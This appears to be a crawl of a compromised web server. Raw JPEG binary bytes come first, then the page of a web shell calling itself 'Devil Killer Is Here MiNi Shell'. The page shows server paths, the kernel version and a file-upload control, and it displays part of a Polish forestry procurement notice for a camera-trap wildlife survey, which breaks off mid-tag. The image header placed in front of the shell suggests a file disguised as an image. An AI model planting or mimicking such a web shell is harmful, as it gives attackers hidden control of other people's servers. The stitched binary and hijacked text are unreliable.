JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220922/0035974601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa wyk. oceny liczebności i zagęszczenia zwierząt za pom. fotopułapek na ter. leśnych, zgodnie z jedną z dost. metod szac. zagęszcz. pop. zwierzyny, takich jak: REM, distance sampling, REST” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzą zamawiający działający wspólnie</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Regionalna Dyrekcja Lasów Państwowych w Zielonej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970040310</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kazimierza Wielkiego 24a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielona Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">65-950</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">68 455 85 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rdlp@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka leśna </p> <h3 class="mb-0">1.8.) Informacje o pozostałych zamawiających działających wspólnie</h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">2</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Cybinka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">970039927</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dąbrowskiego 43</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Cybinka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">69-108</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 68 391 11 52</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cybinka@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">cybinka.zielonagora.lasy.gov.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">3</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Krosno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">970040132</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krośnieńska 42</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Osiecznica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 68 383 07 14</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">krosno@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">krosno.zielonagora.lasy.gov.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">4</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Krzystkowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">970040149</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Leśna 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowogród Bobrzański</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-010</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 68 327 65 32</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">krzystkowice@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">krzystkowice.zielonagora.lasy.gov.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">5</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Sulechów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">970040184</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bankowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sulechów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 68 385 23 74</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sulechow@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">sulechow.zielonagora.lasy.gov.pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">6</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Świebodzin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">970040209</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świebodzin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 68 382 20 01</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">swiebodzin@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://swiebodzin.zielonagora.lasy.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">7</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Szprotawa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">970040190</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Henrykowska 1a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szprotawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 68 376 33 79</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">szprotawa@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://swiebodzin.zielonagora.lasy.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">8</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Torzym</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">970040215</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wodna 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Torzym</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-235</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 68 384 21 46</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">torzym@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://torzym.zielonagora.lasy.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">9</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Wymiarki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">970040238</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Łąkowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wymiarki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">68-131</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 68 360 40 06</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wymiarki@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://wymiarki.zielonagora.lasy.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">10</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Babimost</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">970040304</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Leśna 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Babimost</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 68 351 22 55</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">babimost@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://babimost.zielonagora.lasy.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">11</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Bytnica</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">970495074</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bytnica 160</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bytnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-630</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 6835122 55</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bytnica@zielonagora.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bytnica.zielonagora.lasy.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">12</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Powiatowe Gospodarstwo Leśne Lasy Państwowe- Regionalna Dyrekcja Lasów Państwowych w Szczecinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">810539462</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Juliusza Słowackiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">71-434</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 91 432 87 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rdlp@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.szczecin.lasy.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">13</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Rzepin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">810539278</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Puszczy Rzepińskiej 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzepin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">69-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 95 759 86 05</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rzepin@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rzepin.szczecin.lasy.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">14</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Trzciel</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">8105393</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Graniczna 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Trzciel</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 95 742 86 11</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">trzciel@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://trzciel.szczecin.lasy.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">15</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Międzyrzecz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">810539226</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poznańska 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Międzyrzecz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 95 741 23 66</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">miedzyrzecz@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://miedzyrzecz.szczecin.lasy.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">16</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Głusko</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">810539108</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Głusko 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Głusko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-520</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 570 300 799</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">glusko@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://glusko.szczecin.lasy.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">17</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Inspektorat Weterynarii w Zielonej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">971187392</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Browarna 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielona Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">65-849</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 68 453 73 24</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zielonagora.wiw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zgora.wiw.gov.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">18</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Inspektorat Weterynarii w Gorzowie Wielkopolskim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">210467190</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żwirowa 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gorzów Wielkopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 95 720 20 72</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gorzowwlkp.piw@wet.zgora.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www: piw.gorzow.com</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">19</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Inspektorat Weterynarii w Krośnie Odrzańskim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">971183900</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">F. Chopina 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span 